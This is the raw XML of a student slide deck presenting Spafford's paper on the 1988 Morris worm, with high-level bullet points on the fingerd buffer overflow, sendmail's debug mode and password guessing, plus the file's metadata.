              <a:t>Allows users to obtain information (full name, login name, …) about other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs as a daemon to service remote requests (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flaw only works on VAX machines, not on SUNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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7</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Gruppieren 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="852611" y="3188048"/>
            <a:ext cx="5375189" cy="988541"/>
            <a:chOff x="852611" y="3188048"/>
            <a:chExt cx="5375189" cy="988541"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rechteck: abgerundete Ecken 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="852611" y="3188048"/>
              <a:ext cx="1940011" cy="988541"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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Overrunning</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Textfeld 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2792622" y="3375352"/>
              <a:ext cx="3435178" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Get-call takes input to a buffer without checking any bounds</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Gruppieren 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1822616" y="4176589"/>
            <a:ext cx="8211064" cy="989978"/>
            <a:chOff x="1822616" y="4176589"/>
            <a:chExt cx="8211064" cy="989978"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rechteck: abgerundete Ecken 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3538146" y="4178026"/>
              <a:ext cx="1940011" cy="988541"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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Rewrite stack frame</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Verbinder: gewinkelt 12"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="2"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="2432527" y="3566678"/>
              <a:ext cx="495708" cy="1715529"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1936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5488453" y="4373359"/>
              <a:ext cx="4545227" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Overflow resulted in the return stack frame for the main routine being changed </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Gruppieren 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4508152" y="5166566"/>
            <a:ext cx="6909486" cy="988542"/>
            <a:chOff x="4508152" y="5166566"/>
            <a:chExt cx="6909486" cy="988542"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rechteck: abgerundete Ecken 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6223681" y="5166567"/>
              <a:ext cx="1940011" cy="988541"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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Altering behavior of program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Verbinder: gewinkelt 13"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="10" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="5118781" y="4555937"/>
              <a:ext cx="494271" cy="1715529"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1936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8163692" y="5476171"/>
              <a:ext cx="3253946" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Execute specific code instead</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347551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Flaws of the Systems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mailer designed to route mail in a heterogeneous inter-network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs in various modes, but worm exploited the daemon mode in combination with the debug mode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is listening on port #25 for attempts to deliver mail using SMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm contacted the port #25 of victim machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issued the DEBUG functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specified a set of commands instead of user address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEBUG-mode was often used and often left turned on by vendors and administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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8</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2042169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Flaws of the Systems: Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="3469184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key attack of the worm involved attempts to discover user passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypted password of each user was in a publicly readable file (permuted version of the DES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Fußzeilenplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Paper Presentation – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Gruppieren 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="687640" y="2650708"/>
            <a:ext cx="9316331" cy="1496114"/>
            <a:chOff x="687640" y="2650708"/>
            <a:chExt cx="9316331" cy="1496114"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Textfeld 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="687640" y="2859215"/>
              <a:ext cx="7465760" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="342900" indent="-342900">
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Encrypt possible passwords </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900">
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Compare against the actual password without any system calls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900">
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Try common words/combinations until a match is found</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Gruppieren 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8000117" y="2650708"/>
              <a:ext cx="2003854" cy="1496114"/>
              <a:chOff x="7856838" y="2755557"/>
              <a:chExt cx="2093528" cy="1683726"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Pfeil: nach oben gekrümmt 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="7856838" y="2755557"/>
                <a:ext cx="1873989" cy="810906"/>
              </a:xfrm>
              <a:prstGeom prst="curvedUpArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 40000"/>
                  <a:gd name="adj2" fmla="val 93008"/>
                  <a:gd name="adj3" fmla="val 25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Pfeil: nach oben gekrümmt 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8076377" y="3628377"/>
                <a:ext cx="1873989" cy="810906"/>
              </a:xfrm>
              <a:prstGeom prst="curvedUpArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 40000"/>
                  <a:gd name="adj2" fmla="val 93008"/>
                  <a:gd name="adj3" fmla="val 25000"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Gruppieren 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="778472" y="4227762"/>
            <a:ext cx="7832128" cy="521426"/>
            <a:chOff x="778472" y="4227762"/>
            <a:chExt cx="7832128" cy="521426"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Textfeld 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1470566" y="4281457"/>
              <a:ext cx="7140034" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Using password lists and dividing task among multiple processors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Pfeil: gestreift nach rechts 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="778472" y="4227762"/>
              <a:ext cx="642551" cy="521426"/>
            </a:xfrm>
            <a:prstGeom prst="stripedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 42484"/>
                <a:gd name="adj2" fmla="val 50000"/>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Inhaltsplatzhalter 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273537" y="4977636"/>
            <a:ext cx="11585122" cy="12831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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm exploited accessibility of password file coupled with the tendency of users to choose common words as passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229894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3534</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>746</Paragraphs>
  <Slides>34</Slides>
  <Notes>26</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Verwendete Schriftarten</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Design</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Folientitel</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="44" baseType="lpstr">
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Demi Cond</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Benutzerdefiniertes Design</vt:lpstr>
      <vt:lpstr>Crisis and Aftermath Eugene H. Spafford</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>History</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Worm vs. Virus</vt:lpstr>
      <vt:lpstr>Flaws of the Systems: Finger(d)</vt:lpstr>
      <vt:lpstr>Flaws of the Systems: Sendmail</vt:lpstr>
      <vt:lpstr>Flaws of the Systems: Passwords</vt:lpstr>
      <vt:lpstr>Flaws of the Systems: Trusted Logins</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Morris Worm: High-Level Description</vt:lpstr>
      <vt:lpstr>Morris Worm: High-Level Description</vt:lpstr>
      <vt:lpstr>Morris Worm: High-Level Description</vt:lpstr>
      <vt:lpstr>Morris Worm: Gather Information</vt:lpstr>
      <vt:lpstr>Morris Worm: Infection attempts</vt:lpstr>
      <vt:lpstr>Morris Worm: 5 State Machine</vt:lpstr>
      <vt:lpstr>Morris Worm: 5 State Machine</vt:lpstr>
      <vt:lpstr>Morris Worm: Vector Program</vt:lpstr>
      <vt:lpstr>Morris Worm: Vector Program</vt:lpstr>
      <vt:lpstr>Morris Worm: Main-Program Initiation</vt:lpstr>
      <vt:lpstr>Morris Worm: Main-Program Features</vt:lpstr>
      <vt:lpstr>Morris Worm: Main-Program Survival</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Aftermath – Damage</vt:lpstr>
      <vt:lpstr>Aftermath – Who and Why?</vt:lpstr>
      <vt:lpstr>Aftermath - CERT</vt:lpstr>
      <vt:lpstr>Aftermath – Fix the Problem</vt:lpstr>
      <vt:lpstr>Thank You!</vt:lpstr>
      <vt:lpstr>Literature:</vt:lpstr>
      <vt:lpstr>Appendix I – Call of the Main Program</vt:lpstr>
      <vt:lpstr>Appendix II – Details of Fingerd Flaw</vt:lpstr>
      <vt:lpstr>Appendix III – Fix the Flaws</vt:lpstr>
      <vt:lpstr>Appendix IIII – Conclusion (Condt.)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Benno</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>142</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-13T15:06:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-15T05:47:25Z</dcterms:modified>
</cp:coreProperties>
</file>